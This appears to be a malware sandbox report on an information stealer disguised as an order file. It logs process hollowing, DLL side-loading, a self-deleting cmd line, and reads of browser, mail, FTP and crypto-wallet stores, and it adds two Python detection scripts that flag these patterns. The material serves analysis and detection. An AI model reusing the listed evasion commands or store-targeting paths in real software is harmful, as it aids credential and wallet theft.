Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4760008
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\msvcp140.dll
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "cvtres.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Queries volume information: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: GetLocaleInfoA, 1_2_00404B4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00417098 GetTimeZoneInformation, 1_2_00417098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, 1_2_00404C15
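The behaviour lines above record the full loader chain in three steps: the .NET dropper allocates an RWX region at 0x400000 inside a freshly spawned cvtres.exe and writes a PE image (value starts with 4D5A, the MZ header) into it, the hollowed cvtres.exe then loads nss3.dll/mozglue.dll and the VC runtime from a folder under %TEMP% (side-loaded so the Azorult payload can read Firefox credential stores), and finally it removes itself with cmd /c timeout 3 & del. The following added example is a triage script written for this page, not part of the sandbox's tooling; it parses lines in the report's own "Source: ... <event>: ..." form and correlates them into those three findings. The sample input is constructed from the lines above, and the regexes assume the event wording shown here.

```python
"""Pull process-injection, DLL-side-loading and self-deletion indicators out
of sandbox behaviour lines written in the "Source: ... <event>: ..." form
used by this report, and correlate them per (source, target) pair."""
import re

# Constructed input, modelled on the behaviour lines above (a trailing
# "Jump to behavior" link text is tolerated but not required).
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41E000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: C:\Windows\SysWOW64\kernel32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "cvtres.exe"
""".strip().splitlines()

SRC = r'^Source: (?P<src>.+?) '
TAIL = r'(?: Jump to behavior)?$'
RE_ALLOC = re.compile(SRC + r'Memory allocated: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+?)' + TAIL)
RE_WRITE = re.compile(SRC + r'Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?' + TAIL)
RE_LOAD = re.compile(SRC + r'Section loaded: (?P<path>.+?)' + TAIL)
RE_PROC = re.compile(SRC + r'Process created: (?P<image>.+?\.exe) (?P<cmd>.+?)' + TAIL)

# "timeout N & del ..." is the classic wait-then-delete-self idiom.
SELF_DELETE = re.compile(r'\btimeout(?:\.exe)?\s+\d+\s*&+\s*del\b', re.IGNORECASE)
# A DLL mapped from the user's temp folder is a side-loading candidate.
TEMP_DLL = re.compile(r'\\AppData\\Local\\Temp\\.*\.dll$', re.IGNORECASE)


def parse(lines):
    """Turn each recognised line into (kind, fields); unknown lines are skipped."""
    events = []
    for raw in lines:
        line = raw.strip()
        for kind, rx in (('alloc', RE_ALLOC), ('write', RE_WRITE),
                         ('load', RE_LOAD), ('proc', RE_PROC)):
            m = rx.match(line)
            if m:
                events.append((kind, m.groupdict()))
                break
    return events


def triage(lines):
    """Return (finding, source, target, detail) tuples in input order."""
    events = parse(lines)
    # RWX allocations keyed by (injector, victim, base); collected first because
    # the report does not guarantee the allocation precedes the writes.
    rwx = {(e['src'], e['dst'], e['base'].upper())
           for k, e in events
           if k == 'alloc' and 'execute' in e['prot'] and 'write' in e['prot']}
    findings = []
    for kind, e in events:
        if kind == 'write':
            key = (e['src'], e['dst'], e['base'].upper())
            # PE image (MZ header) written into an RWX region of another process.
            if key in rwx and (e['magic'] or '').upper().startswith('4D5A'):
                findings.append(('pe_injection', e['src'], e['dst'], '0x' + key[2]))
        elif kind == 'load' and TEMP_DLL.search(e['path']):
            findings.append(('dll_from_temp', e['src'], e['path'], ''))
        elif kind == 'proc' and SELF_DELETE.search(e['cmd']):
            findings.append(('self_delete', e['src'], e['image'], e['cmd']))
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_LINES):
        print(f)
```

The injection check deliberately requires both the RWX allocation and an MZ-prefixed write at the same base in the same victim; a write alone (the 41E000 and 4760008 lines above) is how any debugger or instrumentation library touches a child and would be noise on its own.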

Stealing of Sensitive Information

Source: Yara match File source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.7e35982.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.7e3b8e3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.7e414d2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.294332451.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.309870959.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NUEVA ORDEN-MATSA 10-2022,.exe PID: 1504, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 4128, type: MEMORYSTR
Source: Yara match File source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NUEVA ORDEN-MATSA 10-2022,.exe PID: 1504, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 4128, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: cvtres.exe, 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match File source: 1.2.cvtres.exe.7e35982.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.7e3b8e3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.cvtres.exe.7e414d2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.299860559.00000000070E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cvtres.exe PID: 4128, type: MEMORYSTR
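What makes the file and registry accesses above unmistakably a stealer rather than a backup or sync agent is breadth: a single hollowed cvtres.exe opens the Outlook profile key, WinSCP sessions, the FileZilla server list, the Pidgin accounts file, Chrome's Login Data and five different wallet locations within one run, none of which a resource converter has any business reading. The added example below is a hunting script written for this page (not the sandbox's own logic) that scores that pattern over file/registry-open events: each touched path is bucketed into a store category using patterns drawn from the paths and strings this sample used, accesses by the store's owning application are discounted, and a process is alerted on only when it reaches several categories as a non-owner. The event list, the pids and the owner allowlist are constructed assumptions for the demonstration.

```python
"""Flag a credential-store sweep: one process opening password, session and
wallet stores that belong to many unrelated applications, as cvtres.exe does
above. Single-store access is noisy (backup agents, sync clients); the
signal is breadth across categories by an image that does not own the store."""
import re
from collections import defaultdict

# Category patterns taken from the paths and registry keys this sample opened
# or carried as strings. Regexes run case-insensitively over the path text.
STORE_PATTERNS = {
    'mail':    [r'\\Windows Messaging Subsystem\\Profiles'],
    'wallet':  [r'\\Electrum(-LTC)?\\wallets', r'\\Jaxx\\Local Storage', r'\\Exodus(\\|$)',
                r'\\Ethereum\\keystore', r'\\monero-project\\monero-core', r'\\Bitcoin\\Bitcoin-Qt'],
    'ftp_scp': [r'\\Martin Prikryl\\WinSCP 2\\Sessions', r'\\filezilla\\recentservers\.xml'],
    'im':      [r'\\\.purple\\accounts\.xml'],
    'browser': [r'\\Google\\Chrome\\User Data\\.*\\Login Data$'],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats]
            for cat, pats in STORE_PATTERNS.items()}

# Assumed allowlist: the image that legitimately opens each store. Anything
# else reading it counts as a foreign access. Extend it for your own estate.
OWNER_IMAGES = {
    'mail': {'outlook.exe'},
    'wallet': {'electrum.exe', 'electrum-ltc.exe', 'jaxx.exe', 'exodus.exe',
               'monero-wallet-gui.exe', 'bitcoin-qt.exe'},
    'ftp_scp': {'winscp.exe', 'filezilla.exe'},
    'im': {'pidgin.exe'},
    'browser': {'chrome.exe'},
}

CVTRES = r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe'
CHROME = r'C:\Program Files\Google\Chrome\Application\chrome.exe'
# Constructed events: (pid, image, path or registry key opened), modelled on
# the "File opened" / "Key opened" lines above plus benign control accesses.
SAMPLE_EVENTS = [
    (4128, CVTRES, r'HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook'),
    (4128, CVTRES, r'C:\Users\user\AppData\Roaming\Electrum-LTC\wallets'),
    (4128, CVTRES, r'C:\Users\user\AppData\Roaming\Jaxx\Local Storage'),
    (4128, CVTRES, r'HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions'),
    (4128, CVTRES, r'C:\Users\user\AppData\Roaming\filezilla\recentservers.xml'),
    (4128, CVTRES, r'HKEY_CURRENT_USER\Software\monero-project\monero-core'),
    (4128, CVTRES, r'HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt'),
    (4128, CVTRES, r'C:\Users\user\AppData\Roaming\.purple\accounts.xml'),
    (4128, CVTRES, r'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data'),
    (4128, CVTRES, r'C:\Windows\SysWOW64\kernel32.dll'),
    (2222, CHROME, r'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data'),
]


def classify(target):
    """Return the store category a path/key belongs to, or None if it is not a store."""
    for cat, rxs in COMPILED.items():
        if any(rx.search(target) for rx in rxs):
            return cat
    return None


def sweep_report(events, min_categories=3):
    """Map pid -> alert for every process that read stores of >= min_categories
    distinct categories without being the owning application of those stores."""
    per_proc = defaultdict(lambda: {'image': None, 'foreign': []})
    for pid, image, target in events:
        cat = classify(target)
        if cat is None:
            continue
        rec = per_proc[pid]
        rec['image'] = image
        base = image.rsplit('\\', 1)[-1].lower()
        if base not in OWNER_IMAGES.get(cat, set()):
            rec['foreign'].append((cat, target))
    alerts = {}
    for pid, rec in per_proc.items():
        cats = {c for c, _ in rec['foreign']}
        if len(cats) >= min_categories:
            alerts[pid] = {'image': rec['image'], 'categories': sorted(cats),
                           'hits': len(rec['foreign'])}
    return alerts


if __name__ == '__main__':
    for pid, alert in sweep_report(SAMPLE_EVENTS).items():
        print(pid, alert['image'], alert['categories'], alert['hits'])
```

The threshold is on distinct categories rather than raw hit count on purpose: a password manager's browser import or a wallet backup job legitimately reads one store many times, but nothing benign reads mail, FTP, IM, browser and wallet secrets in the same process. The Ethereum and Exodus entries come from strings carried in cvtres.exe's memory rather than from observed opens, which is why the table covers them even though this run never touched them.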